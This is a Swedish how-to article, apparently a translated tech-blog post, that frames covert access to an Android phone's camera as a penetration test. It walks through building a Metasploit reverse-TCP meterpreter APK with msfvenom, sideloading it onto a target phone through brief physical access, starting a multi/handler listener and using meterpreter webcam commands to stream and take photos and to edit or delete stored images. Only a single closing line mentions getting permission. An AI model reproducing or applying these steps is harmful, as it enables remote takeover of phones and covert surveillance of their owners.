Det har funnits flera nyheter om hackare som kapat Android-telefonkameror för att avlyssna sina användare eller förse dem med falska bilder. Som en varningstelefägare kanske du vill förhindra detta genom att bedöma sannolikheten och de verkliga riskerna för en sådan hothändelse.
Kali Linux är ett av de bästa verktygen för att kontrollera din Android-telefons kameras potentiella sårbarheter genom ett penetrationstest. Det kan hjälpa dig att hålla koll på alla hackerförsök att fjärråtkomst till telefonens kamera.
Installera en nyttolast
För att använda Kali Linux för ett penetrationstest, ladda ner det först från dess officiella webbplats. Se den här tidigare guiden för definitioner av olika jargoner som ”msfvenom”, ”msfconsole”, ”meterpreter” och mer som kommer att användas i den här övningen.
Det första steget i penetrationstestning är att installera en standardutnyttjande nyttolast på enheten. För detta öppnar du Kali Linux-terminalen och anger följande kommando: ifconfig
. Detta ger dig IP-adressen till din Kali Linux-session.

Ange nu kommandot som visas nedan med ovanstående IP-adress. Portnumret för exploateringar, trojaner och andra sårbarheter anges vanligtvis som 4444.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk
I det här steget försöker du injicera en nyttolast för metasploit, som är baserad på en Java-tolk. Om det lyckas hjälper penetrationstestet dig att verifiera om din telefon är sårbar för någon som lyssnar på telefonsamtal, får tillgång till SMS, geografisk lokalisering av användaren etc.
I det här fallet är försöket att visa hur exploateringen potentiellt kan användas för att komma åt telefonens kameror.

När exploateringen har initierats installeras en APK-fil som heter “Payload” i rotmappen. Du måste installera den på en mål-Android-telefon. Det är dock lättare sagt än gjort. De flesta nyare Android-telefoner och e-postmeddelanden kommer att vägra att bära sådana skadade filer med skadlig kod, och det är bra.
Det kan dock fortfarande uppnås genom en USB-kabel eller tillfälliga filer. Om en hackare har tillgång till din telefon i några minuter, gör det den något sårbar. Vår ansträngning här i detta penetrationstest är att bestämma den exakta omfattningen av risken.

När du väl har överförts måste du hitta ett sätt att installera nyttolastfilen på din telefon. Om det inte är en mycket gammal Android-version, bör din telefon ge dig flera varningar innan APK kan installeras. Oavsett Android-telefonversionen finns det fortfarande många andra sätt att installera appar från okända källor i en Android-telefon.

Startar exploateringen
För att starta ovanstående nyttolast utnyttjar du följande kommando: msfconsole
. Det tar bara några sekunder för kommandot att köras, och metasploiten kan göras för ytterligare penetrationstest på telefonens kameror.

Metasploiten kommer att ge sin egen fullständiga beskrivning. Nyttoladdssammanfattningen är också synlig. Den visar antalet utnyttjanden på jobbet.

I nästa steg är msfconsole redo att starta exploateringen. För detta, se IP-adressen och portnumret (4444) som diskuterats tidigare. Följaktligen anger du följande kommandon:
exploit (multi/handler) > set LHOST "IP Address" [ENTER] set LPORT "Port number" [ENTER] exploit [ENTER]

När den omvända TCP-hanteraren är aktiverad ser du olika steg i Meterpreter starta sig själv. Vänta några sekunder medan den diagnostiserar måltelefonen.
Det måste nämnas här att de flesta moderna Android-telefoner kommer att fortsätta att neka denna åtkomst. Kom ihåg att detta är ett penetrationstest. Om din Android-telefon inte kan trängas igenom med den här dödliga APK-filen, betyder det att din telefontillverkare är medveten om just denna attackvektor.

Åtkomst till Android-telefonens kamera
Om du lyckades infoga exploateringen i telefonen finns det en chans att det nu kan trängas igenom. När det händer kommer “meterpreter” på en Kali Linux-terminal att kunna upprätta en anslutning till telefonen. Vid denna punkt, sätt in help
för att komma åt flera alternativ inom Android-telefonen under attack.

Ange följande kommandon (från hjälpmenyn) för att komma åt kamerans telefoner. I detta utnyttjande var det ett försök att komma åt den bakre kameran för att ta bilder från terminalen.
webcam_list [ENTER] 1. Back camera 2. Front camera [ENTER] webcam_stream -i 1
För att slutföra ett framgångsrikt penetrationstest, när du har tillgång till kameran, ta en bild och spara den i Kali Linux-rotmapp. Du kan också redigera, byta namn på eller ta bort de andra bilder som lagras. Därför är varje framgångsrik penetration på den testade telefonen ett väckarklocka med sannolikheten för en riktig attack, vilket innebär att det är dags att gå till en säkerhetsuppdatering.

I denna handledning lärde du dig hur en Android-kamera kan nås från en Kali Linux-terminal för penetrationstestning.
Detta är en säkerhetsforskningsartikel. Om du öppnar någon annans kamera för en demonstration, ska du alltid få deras tillstånd först – såvida det naturligtvis inte är din egen telefon. Glöm inte att kolla in dessa hackingsappar för Android för att hjälpa dig att testa och hitta sårbarheter i din telefon
Relaterad:
-
Hur man installerar och använder en sårbarhetsskanner i Linux
-
Vad är etisk hacking och hur blir du en?
-
Vad är Kali Linux och behöver du det?